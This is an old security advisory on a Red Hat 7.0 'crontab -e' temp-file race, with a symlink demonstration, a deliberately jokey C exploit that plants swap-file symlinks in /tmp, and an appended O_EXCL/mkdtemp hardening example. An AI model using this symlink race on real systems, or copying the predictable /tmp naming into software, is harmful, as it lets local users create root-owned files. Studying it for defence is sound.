Security vulnerability in crontab -e on Red Hat 7.0

Published: 2001-07-03
Updated: 2001-07-03
Severity: High
Threat level: Local administrator privileges
Error type: Design error
Exploitation method: Server mode

Affected systems

RedHat version 7.0

Detailed description

crontab allows a local attacker to create files with root privileges. crontab uses chdir when it loads the vi editor, which lets an attacker create arbitrary files that do not already exist.

Test code

Example:

as User 1
bash$ cd /tmp;ln -s somefile .wahoo.swp

as User 2
bash# cd /tmp;vi /tmp/wahoo
:q
bash# ls -al /tmp/somefile
-rw------- 1 root root 4096 Apr 26 22:56 somefile

Exploit:

/*******************************************************************

Crontab tmp file race condition
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

Apparently this is fixed. Wonder why it still works.

Local exploit
Quick and dirty exploit for crontab insecure tmp files
Redhat 7.0 - kept up2date with up2date
Checked Tue Jun 26 00:15:32 NZST 2001

-rw------- 1 root root 4096 Jun 26 00:15 evil

Requires root to execute crontab -e while the program is running.
Not really likely to be too big of a problem, I hope.

Could possibly be useful with the (still unpatched) makewhatis.cron bug.

-- zen-parse

*******************************************************************/
/*******************************************************************/
#define SAFER [1000]
/*******************************************************************/

int shake(int script kiddy)
{
    int f;
    char r SAFER;
    int w;
    f=fopen("/proc/loadavg","r");
    fscanf(f,"%*s %*s %*s %*s %s",r);
    fclose(f);
    w=atoi(r);
    return w;
}

main(int argc,char *argv[])
{
    int p;
    char v SAFER;
    sprintf(v,"/tmp/.crontab.%d.swp",shake());
    symlink("/evil",v);
    while(access("/evil",0))
    {
        for(p=-30;p<0;p++)
        {
            sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
            symlink("/evil",v);
        }
        sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
        unlink(v);
    }
    for(p=-100;p<0;p++)
    {
        sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
        unlink(v);
    }
}

Solution

Upgrade to the latest version of the program.

Related information

zen-parse at gmx.net
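The weakness described above comes down to a privileged process creating a file under a predictable name in a directory other users can write to. The following is an added example, not code from the advisory, crontab or vi: it contrasts a plain `O_CREAT` open, which follows a pre-planted symlink, with an `O_CREAT|O_EXCL` open, which refuses it. The directory and file names are constructed for the demonstration and everything happens inside a private `mkdtemp()` directory.

```c
#define _XOPEN_SOURCE 700   /* for mkdtemp(), symlink(), lstat() */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak form: O_CREAT alone follows a dangling symlink and creates its target. */
static int naive_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0600);
}

/* Hardened form: with O_CREAT|O_EXCL, open() fails with EEXIST if the name is
 * already taken, even by a dangling symlink, and never follows the link. */
static int exclusive_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed scenario in a private mkdtemp() directory (all names are
 * illustrative). Returns 0 when the hardened call refuses the planted link and
 * the naive call follows it; otherwise the number of the step that differed. */
int demo_planted_symlink(void) {
    char dir[] = "/tmp/swpdemo.XXXXXX";
    char link_path[128], target[128];
    struct stat st;
    int fd, rc = 0;

    if (!mkdtemp(dir)) return 1;
    snprintf(link_path, sizeof link_path, "%s/.wahoo.swp", dir);
    snprintf(target, sizeof target, "%s/somefile", dir);
    if (symlink(target, link_path) != 0) rc = 2;

    if (!rc) {                                   /* hardened: must refuse */
        fd = exclusive_create(link_path);
        if (fd >= 0) { close(fd); rc = 3; }
        else if (errno != EEXIST) rc = 4;
        else if (lstat(target, &st) == 0) rc = 5;   /* target must not exist */
    }
    if (!rc) {                                   /* naive: follows the link */
        fd = naive_create(link_path);
        if (fd < 0) rc = 6;
        else { close(fd); if (lstat(target, &st) != 0) rc = 7; }
    }
    unlink(target); unlink(link_path); rmdir(dir);
    return rc;
}

int main(void) { return demo_planted_symlink(); }
```

A program that starts an editor on a user's behalf gets the same protection by working inside a directory it created with `mkdtemp()` instead of changing into a shared directory such as /tmp.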